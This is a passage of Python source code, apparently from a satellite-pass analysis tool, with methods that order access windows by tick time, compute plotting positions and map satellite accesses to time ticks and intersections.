"\n--> all tks:{}".format(len(all_tks)))
def __accs_init(self):
accs=[]
si_names = self.access_names.copy()
while len(si_names)>0:
min_si = si_names[0]
for si in si_names:
try:
if self.acc2tk[si][0] < self.acc2tk[min_si][0]:
min_si =si
except:
print('error',si)
accs.append(min_si)
si_names.remove(min_si)
self.accs = accs
    def __get_positions(self):  # TODO: move this to the drawer module
position = {}
for acc in self.access_names:
            (tk_in, tk_out) = self.crossLog[acc][0]  # only supports a single pass per satellite, not fully general
y = self.df_align.query(" time >={} and time<={}".format(tk_in, tk_out))[acc].max()
x = math.ceil(((tk_in + tk_out) / 2 - self.all_tks[0]) / 10)
position[acc] = (x, y)
self.position = position
def __get_acc2tk(self):
'''
        Build the acc2tk dict from tiks.
:return:
'''
# self.tikss
# self.
#O(mn-)
acc2tk={}
for si in self.access_names: #O(m)
acc2tk[si]=[]
if si =='s3217':
pass
for tk ,tik in self.tiks.items():#O(n-)
if tik.is_inInter(si):
acc2tk[si].append(tk)
if si in tik.getPass('In'):
acc2tk[si].append(tk)
elif si in tik.getPass('Out'):
acc2tk[si].append(tk)
            acc2tk[si] = list(set(acc2tk[si]))  # deduplicate
acc2tk[si].sort()
self.acc2tk = acc2tk
def getInterTk(self,si,sj):
# print(si,sj)
        if si == 'none' and sj != 'none':
            return self.acc2tk[sj][0]
        if si != 'none' and sj == 'none':
            return self.acc2tk[si][-1]
for tk in self.inter_tks:
inters = self.tiks[tk].getPass('Inter')
for inter in inters:
if {si,sj}&inter =={si,sj}:
return tk
|